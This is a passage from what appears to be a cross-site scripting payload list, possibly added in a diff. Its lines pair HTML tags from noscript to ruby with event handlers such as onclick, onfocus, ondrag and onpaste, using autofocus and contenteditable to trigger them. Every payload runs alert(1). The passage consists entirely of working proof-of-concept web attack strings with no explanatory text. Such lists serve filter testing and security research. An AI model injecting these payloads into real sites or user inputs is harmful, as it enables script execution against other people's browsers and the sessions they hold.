onbeforepaste="alert(1)" contenteditable>test</noscript> +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onclick="alert(1)">test</noscript> +<noscript oncontextmenu="alert(1)">test</noscript> +<noscript oncopy="alert(1)" contenteditable>test</noscript> +<noscript oncut="alert(1)" contenteditable>test</noscript> +<noscript ondblclick="alert(1)">test</noscript> +<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onkeydown="alert(1)" contenteditable>test</noscript> +<noscript onkeypress="alert(1)" contenteditable>test</noscript> +<noscript onkeyup="alert(1)" contenteditable>test</noscript> +<noscript onmousedown="alert(1)">test</noscript> +<noscript onmouseenter="alert(1)">test</noscript> +<noscript onmouseleave="alert(1)">test</noscript> +<noscript onmousemove="alert(1)">test</noscript> +<noscript onmouseout="alert(1)">test</noscript> +<noscript onmouseover="alert(1)">test</noscript> +<noscript onmouseup="alert(1)">test</noscript> +<noscript onpaste="alert(1)" contenteditable>test</noscript> +<object data=/ onload=alert(1)> +<object data=/ onreadystatechange=alert(1)> +<object draggable="true" ondrag="alert(1)">test</object> +<object draggable="true" ondragend="alert(1)">test</object> +<object draggable="true" ondragenter="alert(1)">test</object> +<object draggable="true" ondragleave="alert(1)">test</object> +<object draggable="true" ondragstart="alert(1)">test</object> +<object id=x onfocus=alert(1) type=text/html> +<object id=x onfocusin=alert(1) type=text/html> +<object id=x tabindex=1 onactivate=alert(1)></object> +<object id=x tabindex=1 onbeforeactivate=alert(1)></object> +<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> +<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> +<object onbeforecopy="alert(1)" contenteditable>test</object> +<object onbeforecut="alert(1)" contenteditable>test</object> +<object onbeforepaste="alert(1)" contenteditable>test</object> +<object onblur=alert(1) tabindex=1 id=x></object><input autofocus> +<object onclick="alert(1)">test</object> +<object oncontextmenu="alert(1)">test</object> +<object oncopy="alert(1)" contenteditable>test</object> +<object oncut="alert(1)" contenteditable>test</object> +<object ondblclick="alert(1)">test</object> +<object onerror=alert(1) data=1 type=image/gif> +<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> +<object onkeydown="alert(1)" contenteditable>test</object> +<object onkeypress="alert(1)" contenteditable>test</object> +<object onkeyup="alert(1)" contenteditable>test</object> +<object onmousedown="alert(1)">test</object> +<object onmouseenter="alert(1)">test</object> +<object onmouseleave="alert(1)">test</object> +<object onmousemove="alert(1)">test</object> +<object onmouseout="alert(1)">test</object> +<object onmouseover="alert(1)">test</object> +<object onmouseup="alert(1)">test</object> +<object onpaste="alert(1)" contenteditable>test</object> +<ol draggable="true" ondrag="alert(1)">test</ol> +<ol draggable="true" ondragend="alert(1)">test</ol> +<ol draggable="true" ondragenter="alert(1)">test</ol> +<ol draggable="true" ondragleave="alert(1)">test</ol> +<ol draggable="true" ondragstart="alert(1)">test</ol> +<ol id=x tabindex=1 onactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> +<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> +<ol id=x tabindex=1 onfocus=alert(1)></ol> +<ol id=x tabindex=1 onfocusin=alert(1)></ol> +<ol onbeforecopy="alert(1)" contenteditable>test</ol> +<ol onbeforecut="alert(1)" contenteditable>test</ol> +<ol onbeforepaste="alert(1)" contenteditable>test</ol> +<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onclick="alert(1)">test</ol> +<ol oncontextmenu="alert(1)">test</ol> +<ol oncopy="alert(1)" contenteditable>test</ol> +<ol oncut="alert(1)" contenteditable>test</ol> +<ol ondblclick="alert(1)">test</ol> +<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onkeydown="alert(1)" contenteditable>test</ol> +<ol onkeypress="alert(1)" contenteditable>test</ol> +<ol onkeyup="alert(1)" contenteditable>test</ol> +<ol onmousedown="alert(1)">test</ol> +<ol onmouseenter="alert(1)">test</ol> +<ol onmouseleave="alert(1)">test</ol> +<ol onmousemove="alert(1)">test</ol> +<ol onmouseout="alert(1)">test</ol> +<ol onmouseover="alert(1)">test</ol> +<ol onmouseup="alert(1)">test</ol> +<ol onpaste="alert(1)" contenteditable>test</ol> +<optgroup draggable="true" ondrag="alert(1)">test</optgroup> +<optgroup draggable="true" ondragend="alert(1)">test</optgroup> +<optgroup draggable="true" ondragenter="alert(1)">test</optgroup> +<optgroup draggable="true" ondragleave="alert(1)">test</optgroup> +<optgroup draggable="true" ondragstart="alert(1)">test</optgroup> +<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> +<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> +<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> +<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> +<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> +<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onclick="alert(1)">test</optgroup> +<optgroup oncontextmenu="alert(1)">test</optgroup> +<optgroup oncopy="alert(1)" contenteditable>test</optgroup> +<optgroup oncut="alert(1)" contenteditable>test</optgroup> +<optgroup ondblclick="alert(1)">test</optgroup> +<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onkeydown="alert(1)" contenteditable>test</optgroup> +<optgroup onkeypress="alert(1)" contenteditable>test</optgroup> +<optgroup onkeyup="alert(1)" contenteditable>test</optgroup> +<optgroup onmousedown="alert(1)">test</optgroup> +<optgroup onmouseenter="alert(1)">test</optgroup> +<optgroup onmouseleave="alert(1)">test</optgroup> +<optgroup onmousemove="alert(1)">test</optgroup> +<optgroup onmouseout="alert(1)">test</optgroup> +<optgroup onmouseover="alert(1)">test</optgroup> +<optgroup onmouseup="alert(1)">test</optgroup> +<optgroup onpaste="alert(1)" contenteditable>test</optgroup> +<option draggable="true" ondrag="alert(1)">test</option> +<option draggable="true" ondragend="alert(1)">test</option> +<option draggable="true" ondragenter="alert(1)">test</option> +<option draggable="true" ondragleave="alert(1)">test</option> +<option draggable="true" ondragstart="alert(1)">test</option> +<option id=x tabindex=1 onactivate=alert(1)></option> +<option id=x tabindex=1 onbeforeactivate=alert(1)></option> +<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> +<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> +<option id=x tabindex=1 onfocus=alert(1)></option> +<option id=x tabindex=1 onfocusin=alert(1)></option> +<option onbeforecopy="alert(1)" contenteditable>test</option> +<option onbeforecut="alert(1)" contenteditable>test</option> +<option onbeforepaste="alert(1)" contenteditable>test</option> +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus> +<option onclick="alert(1)">test</option> +<option oncontextmenu="alert(1)">test</option> +<option oncopy="alert(1)" contenteditable>test</option> +<option oncut="alert(1)" contenteditable>test</option> +<option ondblclick="alert(1)">test</option> +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> +<option onkeydown="alert(1)" contenteditable>test</option> +<option onkeypress="alert(1)" contenteditable>test</option> +<option onkeyup="alert(1)" contenteditable>test</option> +<option onmousedown="alert(1)">test</option> +<option onmouseenter="alert(1)">test</option> +<option onmouseleave="alert(1)">test</option> +<option onmousemove="alert(1)">test</option> +<option onmouseout="alert(1)">test</option> +<option onmouseover="alert(1)">test</option> +<option onmouseup="alert(1)">test</option> +<option onpaste="alert(1)" contenteditable>test</option> +<output draggable="true" ondrag="alert(1)">test</output> +<output draggable="true" ondragend="alert(1)">test</output> +<output draggable="true" ondragenter="alert(1)">test</output> +<output draggable="true" ondragleave="alert(1)">test</output> +<output draggable="true" ondragstart="alert(1)">test</output> +<output id=x tabindex=1 onactivate=alert(1)></output> +<output id=x tabindex=1 onbeforeactivate=alert(1)></output> +<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> +<output id=x tabindex=1 onfocus=alert(1)></output> +<output id=x tabindex=1 onfocusin=alert(1)></output> +<output onbeforecopy="alert(1)" contenteditable>test</output> +<output onbeforecut="alert(1)" contenteditable>test</output> +<output onbeforepaste="alert(1)" contenteditable>test</output> +<output onblur=alert(1) tabindex=1 id=x></output><input autofocus> +<output onclick="alert(1)">test</output> +<output oncontextmenu="alert(1)">test</output> +<output oncopy="alert(1)" contenteditable>test</output> +<output oncut="alert(1)" contenteditable>test</output> +<output ondblclick="alert(1)">test</output> +<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> +<output onkeydown="alert(1)" contenteditable>test</output> +<output onkeypress="alert(1)" contenteditable>test</output> +<output onkeyup="alert(1)" contenteditable>test</output> +<output onmousedown="alert(1)">test</output> +<output onmouseenter="alert(1)">test</output> +<output onmouseleave="alert(1)">test</output> +<output onmousemove="alert(1)">test</output> +<output onmouseout="alert(1)">test</output> +<output onmouseover="alert(1)">test</output> +<output onmouseup="alert(1)">test</output> +<output onpaste="alert(1)" contenteditable>test</output> +<p draggable="true" ondrag="alert(1)">test</p> +<p draggable="true" ondragend="alert(1)">test</p> +<p draggable="true" ondragenter="alert(1)">test</p> +<p draggable="true" ondragleave="alert(1)">test</p> +<p draggable="true" ondragstart="alert(1)">test</p> +<p id=x tabindex=1 onactivate=alert(1)></p> +<p id=x tabindex=1 onbeforeactivate=alert(1)></p> +<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> +<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> +<p id=x tabindex=1 onfocus=alert(1)></p> +<p id=x tabindex=1 onfocusin=alert(1)></p> +<p onbeforecopy="alert(1)" contenteditable>test</p> +<p onbeforecut="alert(1)" contenteditable>test</p> +<p onbeforepaste="alert(1)" contenteditable>test</p> +<p onblur=alert(1) tabindex=1 id=x></p><input autofocus> +<p onclick="alert(1)">test</p> +<p oncontextmenu="alert(1)">test</p> +<p oncopy="alert(1)" contenteditable>test</p> +<p oncut="alert(1)" contenteditable>test</p> +<p ondblclick="alert(1)">test</p> +<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> +<p onkeydown="alert(1)" contenteditable>test</p> +<p onkeypress="alert(1)" contenteditable>test</p> +<p onkeyup="alert(1)" contenteditable>test</p> +<p onmousedown="alert(1)">test</p> +<p onmouseenter="alert(1)">test</p> +<p onmouseleave="alert(1)">test</p> +<p onmousemove="alert(1)">test</p> +<p onmouseout="alert(1)">test</p> +<p onmouseover="alert(1)">test</p> +<p onmouseup="alert(1)">test</p> +<p onpaste="alert(1)" contenteditable>test</p> +<param draggable="true" ondrag="alert(1)">test</param> +<param draggable="true" ondragend="alert(1)">test</param> +<param draggable="true" ondragenter="alert(1)">test</param> +<param draggable="true" ondragleave="alert(1)">test</param> +<param draggable="true" ondragstart="alert(1)">test</param> +<param id=x tabindex=1 onactivate=alert(1)></param> +<param id=x tabindex=1 onbeforeactivate=alert(1)></param> +<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus> +<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> +<param id=x tabindex=1 onfocus=alert(1)></param> +<param id=x tabindex=1 onfocusin=alert(1)></param> +<param onbeforecopy="alert(1)" contenteditable>test</param> +<param onbeforecut="alert(1)" contenteditable>test</param> +<param onbeforepaste="alert(1)" contenteditable>test</param> +<param onblur=alert(1) tabindex=1 id=x></param><input autofocus> +<param onclick="alert(1)">test</param> +<param oncontextmenu="alert(1)">test</param> +<param oncopy="alert(1)" contenteditable>test</param> +<param oncut="alert(1)" contenteditable>test</param> +<param ondblclick="alert(1)">test</param> +<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> +<param onkeydown="alert(1)" contenteditable>test</param> +<param onkeypress="alert(1)" contenteditable>test</param> +<param onkeyup="alert(1)" contenteditable>test</param> +<param onmousedown="alert(1)">test</param> +<param onmouseenter="alert(1)">test</param> +<param onmouseleave="alert(1)">test</param> +<param onmousemove="alert(1)">test</param> +<param onmouseout="alert(1)">test</param> +<param onmouseover="alert(1)">test</param> +<param onmouseup="alert(1)">test</param> +<param onpaste="alert(1)" contenteditable>test</param> +<picture draggable="true" ondrag="alert(1)">test</picture> +<picture draggable="true" ondragend="alert(1)">test</picture> +<picture draggable="true" ondragenter="alert(1)">test</picture> +<picture draggable="true" ondragleave="alert(1)">test</picture> +<picture draggable="true" ondragstart="alert(1)">test</picture> +<picture id=x tabindex=1 onactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> +<picture id=x tabindex=1 onfocus=alert(1)></picture> +<picture id=x tabindex=1 onfocusin=alert(1)></picture> +<picture onbeforecopy="alert(1)" contenteditable>test</picture> +<picture onbeforecut="alert(1)" contenteditable>test</picture> +<picture onbeforepaste="alert(1)" contenteditable>test</picture> +<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onclick="alert(1)">test</picture> +<picture oncontextmenu="alert(1)">test</picture> +<picture oncopy="alert(1)" contenteditable>test</picture> +<picture oncut="alert(1)" contenteditable>test</picture> +<picture ondblclick="alert(1)">test</picture> +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onkeydown="alert(1)" contenteditable>test</picture> +<picture onkeypress="alert(1)" contenteditable>test</picture> +<picture onkeyup="alert(1)" contenteditable>test</picture> +<picture onmousedown="alert(1)">test</picture> +<picture onmouseenter="alert(1)">test</picture> +<picture onmouseleave="alert(1)">test</picture> +<picture onmousemove="alert(1)">test</picture> +<picture onmouseout="alert(1)">test</picture> +<picture onmouseover="alert(1)">test</picture> +<picture onmouseup="alert(1)">test</picture> +<picture onpaste="alert(1)" contenteditable>test</picture> +<picture><source srcset="validimage.png"><image onload=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> +<picture><source srcset="validimage.png"><img onload=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> +<plaintext draggable="true" ondrag="alert(1)">test</plaintext> +<plaintext draggable="true" ondragend="alert(1)">test</plaintext> +<plaintext draggable="true" ondragenter="alert(1)">test</plaintext> +<plaintext draggable="true" ondragleave="alert(1)">test</plaintext> +<plaintext draggable="true" ondragstart="alert(1)">test</plaintext> +<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> +<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> +<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> +<plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> +<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onclick="alert(1)">test</plaintext> +<plaintext oncontextmenu="alert(1)">test</plaintext> +<plaintext oncopy="alert(1)" contenteditable>test</plaintext> +<plaintext oncut="alert(1)" contenteditable>test</plaintext> +<plaintext ondblclick="alert(1)">test</plaintext> +<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onkeydown="alert(1)" contenteditable>test</plaintext> +<plaintext onkeypress="alert(1)" contenteditable>test</plaintext> +<plaintext onkeyup="alert(1)" contenteditable>test</plaintext> +<plaintext onmousedown="alert(1)">test</plaintext> +<plaintext onmouseenter="alert(1)">test</plaintext> +<plaintext onmouseleave="alert(1)">test</plaintext> +<plaintext onmousemove="alert(1)">test</plaintext> +<plaintext onmouseout="alert(1)">test</plaintext> +<plaintext onmouseover="alert(1)">test</plaintext> +<plaintext onmouseup="alert(1)">test</plaintext> +<plaintext onpaste="alert(1)" contenteditable>test</plaintext> +<pre draggable="true" ondrag="alert(1)">test</pre> +<pre draggable="true" ondragend="alert(1)">test</pre> +<pre draggable="true" ondragenter="alert(1)">test</pre> +<pre draggable="true" ondragleave="alert(1)">test</pre> +<pre draggable="true" ondragstart="alert(1)">test</pre> +<pre id=x tabindex=1 onactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> +<pre id=x tabindex=1 onfocus=alert(1)></pre> +<pre id=x tabindex=1 onfocusin=alert(1)></pre> +<pre onbeforecopy="alert(1)" contenteditable>test</pre> +<pre onbeforecut="alert(1)" contenteditable>test</pre> +<pre onbeforepaste="alert(1)" contenteditable>test</pre> +<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onclick="alert(1)">test</pre> +<pre oncontextmenu="alert(1)">test</pre> +<pre oncopy="alert(1)" contenteditable>test</pre> +<pre oncut="alert(1)" contenteditable>test</pre> +<pre ondblclick="alert(1)">test</pre> +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onkeydown="alert(1)" contenteditable>test</pre> +<pre onkeypress="alert(1)" contenteditable>test</pre> +<pre onkeyup="alert(1)" contenteditable>test</pre> +<pre onmousedown="alert(1)">test</pre> +<pre onmouseenter="alert(1)">test</pre> +<pre onmouseleave="alert(1)">test</pre> +<pre onmousemove="alert(1)">test</pre> +<pre onmouseout="alert(1)">test</pre> +<pre onmouseover="alert(1)">test</pre> +<pre onmouseup="alert(1)">test</pre> +<pre onpaste="alert(1)" contenteditable>test</pre> +<progress draggable="true" ondrag="alert(1)">test</progress> +<progress draggable="true" ondragend="alert(1)">test</progress> +<progress draggable="true" ondragenter="alert(1)">test</progress> +<progress draggable="true" ondragleave="alert(1)">test</progress> +<progress draggable="true" ondragstart="alert(1)">test</progress> +<progress id=x tabindex=1 onactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> +<progress id=x tabindex=1 onfocus=alert(1)></progress> +<progress id=x tabindex=1 onfocusin=alert(1)></progress> +<progress onbeforecopy="alert(1)" contenteditable>test</progress> +<progress onbeforecut="alert(1)" contenteditable>test</progress> +<progress onbeforepaste="alert(1)" contenteditable>test</progress> +<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onclick="alert(1)">test</progress> +<progress oncontextmenu="alert(1)">test</progress> +<progress oncopy="alert(1)" contenteditable>test</progress> +<progress oncut="alert(1)" contenteditable>test</progress> +<progress ondblclick="alert(1)">test</progress> +<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onkeydown="alert(1)" contenteditable>test</progress> +<progress onkeypress="alert(1)" contenteditable>test</progress> +<progress onkeyup="alert(1)" contenteditable>test</progress> +<progress onmousedown="alert(1)">test</progress> +<progress onmouseenter="alert(1)">test</progress> +<progress onmouseleave="alert(1)">test</progress> +<progress onmousemove="alert(1)">test</progress> +<progress onmouseout="alert(1)">test</progress> +<progress onmouseover="alert(1)">test</progress> +<progress onmouseup="alert(1)">test</progress> +<progress onpaste="alert(1)" contenteditable>test</progress> +<q draggable="true" ondrag="alert(1)">test</q> +<q draggable="true" ondragend="alert(1)">test</q> +<q draggable="true" ondragenter="alert(1)">test</q> +<q draggable="true" ondragleave="alert(1)">test</q> +<q draggable="true" ondragstart="alert(1)">test</q> +<q id=x tabindex=1 onactivate=alert(1)></q> +<q id=x tabindex=1 onbeforeactivate=alert(1)></q> +<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> +<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> +<q id=x tabindex=1 onfocus=alert(1)></q> +<q id=x tabindex=1 onfocusin=alert(1)></q> +<q onbeforecopy="alert(1)" contenteditable>test</q> +<q onbeforecut="alert(1)" contenteditable>test</q> +<q onbeforepaste="alert(1)" contenteditable>test</q> +<q onblur=alert(1) tabindex=1 id=x></q><input autofocus> +<q onclick="alert(1)">test</q> +<q oncontextmenu="alert(1)">test</q> +<q oncopy="alert(1)" contenteditable>test</q> +<q oncut="alert(1)" contenteditable>test</q> +<q ondblclick="alert(1)">test</q> +<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> +<q onkeydown="alert(1)" contenteditable>test</q> +<q onkeypress="alert(1)" contenteditable>test</q> +<q onkeyup="alert(1)" contenteditable>test</q> +<q onmousedown="alert(1)">test</q> +<q onmouseenter="alert(1)">test</q> +<q onmouseleave="alert(1)">test</q> +<q onmousemove="alert(1)">test</q> +<q onmouseout="alert(1)">test</q> +<q onmouseover="alert(1)">test</q> +<q onmouseup="alert(1)">test</q> +<q onpaste="alert(1)" contenteditable>test</q> +<rb draggable="true" ondrag="alert(1)">test</rb> +<rb draggable="true" ondragend="alert(1)">test</rb> +<rb draggable="true" ondragenter="alert(1)">test</rb> +<rb draggable="true" ondragleave="alert(1)">test</rb> +<rb draggable="true" ondragstart="alert(1)">test</rb> +<rb id=x tabindex=1 onactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> +<rb id=x tabindex=1 onfocus=alert(1)></rb> +<rb id=x tabindex=1 onfocusin=alert(1)></rb> +<rb onbeforecopy="alert(1)" contenteditable>test</rb> +<rb onbeforecut="alert(1)" contenteditable>test</rb> +<rb onbeforepaste="alert(1)" contenteditable>test</rb> +<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onclick="alert(1)">test</rb> +<rb oncontextmenu="alert(1)">test</rb> +<rb oncopy="alert(1)" contenteditable>test</rb> +<rb oncut="alert(1)" contenteditable>test</rb> +<rb ondblclick="alert(1)">test</rb> +<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onkeydown="alert(1)" contenteditable>test</rb> +<rb onkeypress="alert(1)" contenteditable>test</rb> +<rb onkeyup="alert(1)" contenteditable>test</rb> +<rb onmousedown="alert(1)">test</rb> +<rb onmouseenter="alert(1)">test</rb> +<rb onmouseleave="alert(1)">test</rb> +<rb onmousemove="alert(1)">test</rb> +<rb onmouseout="alert(1)">test</rb> +<rb onmouseover="alert(1)">test</rb> +<rb onmouseup="alert(1)">test</rb> +<rb onpaste="alert(1)" contenteditable>test</rb> +<rp draggable="true" ondrag="alert(1)">test</rp> +<rp draggable="true" ondragend="alert(1)">test</rp> +<rp draggable="true" ondragenter="alert(1)">test</rp> +<rp draggable="true" ondragleave="alert(1)">test</rp> +<rp draggable="true" ondragstart="alert(1)">test</rp> +<rp id=x tabindex=1 onactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> +<rp id=x tabindex=1 onfocus=alert(1)></rp> +<rp id=x tabindex=1 onfocusin=alert(1)></rp> +<rp onbeforecopy="alert(1)" contenteditable>test</rp> +<rp onbeforecut="alert(1)" contenteditable>test</rp> +<rp onbeforepaste="alert(1)" contenteditable>test</rp> +<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onclick="alert(1)">test</rp> +<rp oncontextmenu="alert(1)">test</rp> +<rp oncopy="alert(1)" contenteditable>test</rp> +<rp oncut="alert(1)" contenteditable>test</rp> +<rp ondblclick="alert(1)">test</rp> +<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onkeydown="alert(1)" contenteditable>test</rp> +<rp onkeypress="alert(1)" contenteditable>test</rp> +<rp onkeyup="alert(1)" contenteditable>test</rp> +<rp onmousedown="alert(1)">test</rp> +<rp onmouseenter="alert(1)">test</rp> +<rp onmouseleave="alert(1)">test</rp> +<rp onmousemove="alert(1)">test</rp> +<rp onmouseout="alert(1)">test</rp> +<rp onmouseover="alert(1)">test</rp> +<rp onmouseup="alert(1)">test</rp> +<rp onpaste="alert(1)" contenteditable>test</rp> +<rt draggable="true" ondrag="alert(1)">test</rt> +<rt draggable="true" ondragend="alert(1)">test</rt> +<rt draggable="true" ondragenter="alert(1)">test</rt> +<rt draggable="true" ondragleave="alert(1)">test</rt> +<rt draggable="true" ondragstart="alert(1)">test</rt> +<rt id=x tabindex=1 onactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> +<rt id=x tabindex=1 onfocus=alert(1)></rt> +<rt id=x tabindex=1 onfocusin=alert(1)></rt> +<rt onbeforecopy="alert(1)" contenteditable>test</rt> +<rt onbeforecut="alert(1)" contenteditable>test</rt> +<rt onbeforepaste="alert(1)" contenteditable>test</rt> +<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onclick="alert(1)">test</rt> +<rt oncontextmenu="alert(1)">test</rt> +<rt oncopy="alert(1)" contenteditable>test</rt> +<rt oncut="alert(1)" contenteditable>test</rt> +<rt ondblclick="alert(1)">test</rt> +<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onkeydown="alert(1)" contenteditable>test</rt> +<rt onkeypress="alert(1)" contenteditable>test</rt> +<rt onkeyup="alert(1)" contenteditable>test</rt> +<rt onmousedown="alert(1)">test</rt> +<rt onmouseenter="alert(1)">test</rt> +<rt onmouseleave="alert(1)">test</rt> +<rt onmousemove="alert(1)">test</rt> +<rt onmouseout="alert(1)">test</rt> +<rt onmouseover="alert(1)">test</rt> +<rt onmouseup="alert(1)">test</rt> +<rt onpaste="alert(1)" contenteditable>test</rt> +<rtc draggable="true" ondrag="alert(1)">test</rtc> +<rtc draggable="true" ondragend="alert(1)">test</rtc> +<rtc draggable="true" ondragenter="alert(1)">test</rtc> +<rtc draggable="true" ondragleave="alert(1)">test</rtc> +<rtc draggable="true" ondragstart="alert(1)">test</rtc> +<rtc id=x tabindex=1 onactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus> +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> +<rtc id=x tabindex=1 onfocus=alert(1)></rtc> +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc> +<rtc onbeforecopy="alert(1)" contenteditable>test</rtc> +<rtc onbeforecut="alert(1)" contenteditable>test</rtc> +<rtc onbeforepaste="alert(1)" contenteditable>test</rtc> +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onclick="alert(1)">test</rtc> +<rtc oncontextmenu="alert(1)">test</rtc> +<rtc oncopy="alert(1)" contenteditable>test</rtc> +<rtc oncut="alert(1)" contenteditable>test</rtc> +<rtc ondblclick="alert(1)">test</rtc> +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onkeydown="alert(1)" contenteditable>test</rtc> +<rtc onkeypress="alert(1)" contenteditable>test</rtc> +<rtc onkeyup="alert(1)" contenteditable>test</rtc> +<rtc onmousedown="alert(1)">test</rtc> +<rtc onmouseenter="alert(1)">test</rtc> +<rtc onmouseleave="alert(1)">test</rtc> +<rtc onmousemove="alert(1)">test</rtc> +<rtc onmouseout="alert(1)">test</rtc> +<rtc onmouseover="alert(1)">test</rtc> +<rtc onmouseup="alert(1)">test</rtc> +<rtc onpaste="alert(1)" contenteditable>test</rtc> +<ruby draggable="true" ondrag="alert(1)">test</ruby> +<ruby draggable="true" ondragend="alert(1)">test</ruby> +<ruby draggable="true" ondragenter="alert(1)">test</ruby> +<ruby draggable="true" ondragleave="alert(1)">test</ruby> +<ruby draggable="true" ondragstart="alert(1)">test</ruby> +<ruby id=x tabindex=1 onactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> +<ruby id=x tabindex=1 onfocus=alert(1)></ruby> +<ruby id=x tabindex=1 onfocusin=alert(1)></ruby> +<ruby onbeforecopy="alert(1)" contenteditable>test</ruby> +<ruby onbeforecut="alert(1)" contenteditable>test</ruby> +<ruby onbeforepaste="alert(1)" contenteditable>test</ruby> +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onclick="alert(1)">test</ruby> +<ruby oncontextmenu="alert(1)">test</ruby> +<ruby oncopy="alert(1)" contenteditable>test</ruby> +<ruby oncut="alert(1)" contenteditable>test</ruby> +<ruby ondblclick="alert(1)">test</ruby> +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onkeydown="alert(1)" contenteditable>test</ruby> +<ruby onkeypress="alert(1)" 